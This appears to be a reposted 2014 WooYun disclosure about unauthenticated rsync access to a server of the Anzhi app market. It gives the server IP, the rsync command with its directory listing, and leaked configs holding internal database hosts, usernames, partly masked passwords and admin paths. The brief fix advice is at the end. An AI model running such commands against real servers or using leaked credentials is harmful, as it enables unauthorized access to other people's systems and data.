记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

安智网某服务未授权访问 导致安智市场、官网、后台源代码泄露

2014-06-20 22:40

#1 漏洞说明

受影响服务器:220.181.167.247

受影响服务:RSYNC 未启用身份识别机制,可匿名访问

#2 利用说明

rsync 220.181.167.247::wwwroot

[root@localhost ~]# rsync 220.181.167.247::wwwroot

drwxrwxr-x 4096 2013/09/30 16:21:10 .

-rw-r--r-- 5 2013/09/30 16:21:10 1.txt

-rw-r--r-- 205825 2010/05/20 16:43:48 200k.jpg

-rw-r--r-- 6168 2011/06/11 23:41:28 cache_common.php

-rw-r--r-- 0 2013/07/24 22:52:01 check_sersync

-rw-r--r-- 526 2011/06/17 23:58:46 index.html

-rw-r--r-- 17 2011/04/09 20:59:44 info.php

-rw-r--r-- 12742060 2011/06/23 00:08:29 new-wwwroot.tar.bz2

-rwxr-xr-x 7621 2011/06/18 20:32:22 stdafx.php

-rw-r--r-- 48 2011/04/27 17:38:32 test.php

drwxr-xr-x 4096 2013/09/30 16:24:03 admin.goapk.com

drwxr-xr-x 4096 2011/03/13 16:32:54 config

drwxr-xr-x 4096 2011/06/30 21:19:40 cron

drwxr-xr-x 4096 2011/04/27 18:15:49 data

drwxr-xr-x 4096 2011/03/13 16:32:54 doc

drwxr-xr-x 4096 2011/06/27 10:59:57 gomarket.goapk.com

drwxr-xr-x 4096 2011/06/22 13:44:52 market.goapk.com

drwxr-xr-x 4096 2011/05/27 10:21:53 model

drwxr-xr-x 4096 2011/07/01 10:39:06 new-wwwroot

drwxr-xr-x 4096 2013/11/25 17:33:31 sxy

drwxr-xr-x 4096 2011/06/01 15:12:01 tools

drwxr-xr-x 4096 2010/09/02 17:37:56 view

drwxr-xr-x 4096 2011/08/16 21:24:50 www.goapk.com

漏洞证明:

#3 敏感信息

http://admin.goapk.com/info.php # phpinfo



#4 某数据库

$config['db']['master'] = array(

'type' => 'mysql',

'host' => '192.168.1.116',

'port' => '3306',

'username' => 'market',

'password' => 'ya3****da0',

'database' => 'newgomarket',

'charset' => 'utf8',

);



$config['db']['slave'] = array(

'type' => 'mysql',

'host' => '192.168.1.117',

'port' => '3306',

'username' => 'market',

'password' => 'ya3****a0',

'database' => 'newgomarket',

'charset' => 'utf8',

);



$config['db']['sphinx'] = array(

'type' => 'sphinx',

'host' => '192.168.1.81',

'port' => '9312',

);



$config['cache']['memcached'] = array(

'host' => '192.168.1.114',

'port' => '11211',



);



$config['cache']['mysql'] = array(

'dbserver' => 'master',

'table' => 'cache',

'key_name' => 'key',

'value_name' => 'value',

);



$prefix = (GO_SERVER_IP == "192.168.0.99") ? '119.57.50' : '192.168.1';

$config['download_log_path'] = array(

//P_LOG_DIR . "/" . 'market.goapk.com' . "/". $file,

//P_LOG_DIR . "/" . 'gomarket.goapk.com' . "/". $file,

"http://${prefix}.114:81/newgomarket.goapk.com/",

"http://${prefix}.115:81/newgomarket.goapk.com/",

//"http://${prefix}.114:81/goapk.yakergong.com/",

//"http://${prefix}.115:81/goapk.yakergong.com/",

"http://${prefix}.114:81/newmarket.goapk.com/",

"http://${prefix}.115:81/newmarket.goapk.com/",

"http://${prefix}.84:81/newmarket.goapk.com/",

"http://${prefix}.84:81/newgomarket.goapk.com/",

//"http://${prefix}.84:81/goapk.yakergong.com/",

//"http://${prefix}.122:81/market.goapk.com/",

//"http://${prefix}.122:81/gomarket.goapk.com/",

//"http://${prefix}.122:81/goapk.yakergong.com/",

);



return $config;





#5 新后台数据库配置

http://newadmin.goapk.com/index.php/Public/login

http://newadmin.goapk.com/Conf/config.php

<?php

return array(

//'配置项'=>'配置值'



/* 数据库设置 */

'DB_TYPE' => 'mysql', // 数据库类型

'DB_HOST' => '192.168.1.116', // 服务器地址

'DB_NAME' => 'newgomarket', // 数据库名

'DB_PORT' => 3306, // 端口

'DB_PREFIX' => 'sj_', // 数据库表前缀

'DB_SUFFIX' => '', // 数据库表后缀

'DB_FIELDTYPE_CHECK' => false, // 是否进行字段类型检查

'DB_FIELDS_CACHE' => false, // 启用字段缓存

'DB_CHARSET' => 'utf8', // 数据库编码默认采用utf8

'DB_DEPLOY_TYPE' => 0, // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)

'DB_RW_SEPARATE' => false, // 数据库读写是否分离 主从式有效



/* 错误设置 */

'ERROR_MESSAGE' => '您浏览的页面暂时发生了错误!请稍后再试~',//错误显示信息,非调试模式有效

'ERROR_PAGE' => '',// 错误定向页面

'URL_CASE_INSENSITIVE' => false, // URL地址是否不区分大小写



'TOKEN_ON' => true, // 开启令牌验证

'TOKEN_NAME' => '__hash__', // 令牌验证的表单隐藏字段名称

'TOKEN_TYPE' => 'md5', // 令牌验证哈希规则





anzhi.jpg



修复方案:

#1 关闭不必要的服务

#2 或者加个密码

知识来源: www.wooyun.org/bugs/wooyun-2014-059688

阅读:136564 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“安智网某服务未授权访问 导致安智市场、官网、后台源代码泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

推广

标签云